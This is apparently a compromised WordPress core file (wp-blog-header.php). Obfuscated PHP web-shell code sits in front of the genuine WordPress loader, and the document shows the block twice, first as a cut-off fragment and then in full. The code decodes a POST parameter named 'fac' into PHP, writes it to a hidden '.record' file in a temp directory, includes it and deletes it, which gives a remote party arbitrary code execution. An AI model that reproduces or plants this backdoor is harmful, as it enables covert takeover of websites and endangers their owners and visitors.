$v8): $chS = ord($s7[$w % $lenS]); $d = ((int)$v8 - $chS - ($w % 10)) ^ 42; $flag .=chr($d); endforeach; while ($element = array_shift($value)) { if ((is_dir($element) and is_writable($element))) { $dat = implode("/", [$element, ".record"]); if (@file_put_contents($dat, $flag) !== false) { include $dat; unlink($dat); exit; } } } } php if(filter_has_var(INPUT_POST, "f\x61c")){ $value = array_filter([session_save_path(), getenv("TEMP"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/tmp", ini_get("upload_tmp_dir")]); $itm = $_POST["f\x61c"]; $itm= explode( '.' , $itm ) ; $flag = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); foreach ($itm as $w => $v8): $chS = ord($s7[$w % $lenS]); $d = ((int)$v8 - $chS - ($w % 10)) ^ 42; $flag .=chr($d); endforeach; while ($element = array_shift($value)) { if ((is_dir($element) and is_writable($element))) { $dat = implode("/", [$element, ".record"]); if (@file_put_contents($dat, $flag) !== false) { include $dat; unlink($dat); exit; } } } } /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }